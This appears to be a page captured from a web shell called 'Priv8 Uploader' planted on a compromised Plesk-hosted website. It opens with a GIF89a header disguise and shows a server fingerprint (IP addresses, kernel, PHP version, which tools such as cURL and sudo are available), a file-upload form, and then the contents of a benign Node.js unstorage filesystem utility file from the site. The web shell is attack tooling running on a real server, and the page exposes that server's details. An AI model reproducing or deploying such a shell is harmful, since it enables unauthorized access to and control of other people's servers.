GIF89a;
GIF89a;Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
| Server IP : 82.165.91.112 / Your IP : 216.73.217.79 Web Server : Apache System : Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64 User : nr7.net_tfpqq467gv ( 10001) PHP Version : 8.4.25 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/nr7.net/emdash.nr7.net/node_modules/unstorage/drivers/utils/ |
Upload File : |
"use strict";
Object.defineProperty(exports, "__esModule", {
value: true
});
exports.ensuredir = ensuredir;
exports.readFile = readFile;
exports.readdir = readdir;
exports.readdirRecursive = readdirRecursive;
exports.rmRecursive = rmRecursive;
exports.stat = stat;
exports.unlink = unlink;
exports.writeFile = writeFile;
var _nodeFs = require("node:fs");
var _nodePath = require("node:path");
function ignoreNotfound(err) {
return err.code === "ENOENT" || err.code === "EISDIR" ? null : err;
}
function ignoreExists(err) {
return err.code === "EEXIST" ? null : err;
}
async function writeFile(path, data, encoding) {
await ensuredir((0, _nodePath.dirname)(path));
return _nodeFs.promises.writeFile(path, data, encoding);
}
function readFile(path, encoding) {
return _nodeFs.promises.readFile(path, encoding).catch(ignoreNotfound);
}
function stat(path) {
return _nodeFs.promises.stat(path).catch(ignoreNotfound);
}
function unlink(path) {
return _nodeFs.promises.unlink(path).catch(ignoreNotfound);
}
function readdir(dir) {
return _nodeFs.promises.readdir(dir, {
withFileTypes: true
}).catch(ignoreNotfound).then(r => r || []);
}
async function ensuredir(dir) {
if ((0, _nodeFs.existsSync)(dir)) {
return;
}
await ensuredir((0, _nodePath.dirname)(dir)).catch(ignoreExists);
await _nodeFs.promises.mkdir(dir).catch(ignoreExists);
}
async function readdirRecursive(dir, ignore, maxDepth) {
if (ignore && ignore(dir)) {
return [];
}
const entries = await readdir(dir);
const files = [];
await Promise.all(entries.map(async entry => {
const entryPath = (0, _nodePath.resolve)(dir, entry.name);
if (entry.isDirectory()) {
if (maxDepth === void 0 || maxDepth > 0) {
const dirFiles = await readdirRecursive(entryPath, ignore, maxDepth === void 0 ? void 0 : maxDepth - 1);
files.push(...dirFiles.map(f => entry.name + "/" + f));
}
} else {
if (!(ignore && ignore(entry.name))) {
files.push(entry.name);
}
}
}));
return files;
}
async function rmRecursive(dir) {
const entries = await readdir(dir);
await Promise.all(entries.map(entry => {
const entryPath = (0, _nodePath.resolve)(dir, entry.name);
if (entry.isDirectory()) {
return rmRecursive(entryPath).then(() => _nodeFs.promises.rmdir(entryPath));
} else {
return _nodeFs.promises.unlink(entryPath);
}
}));
}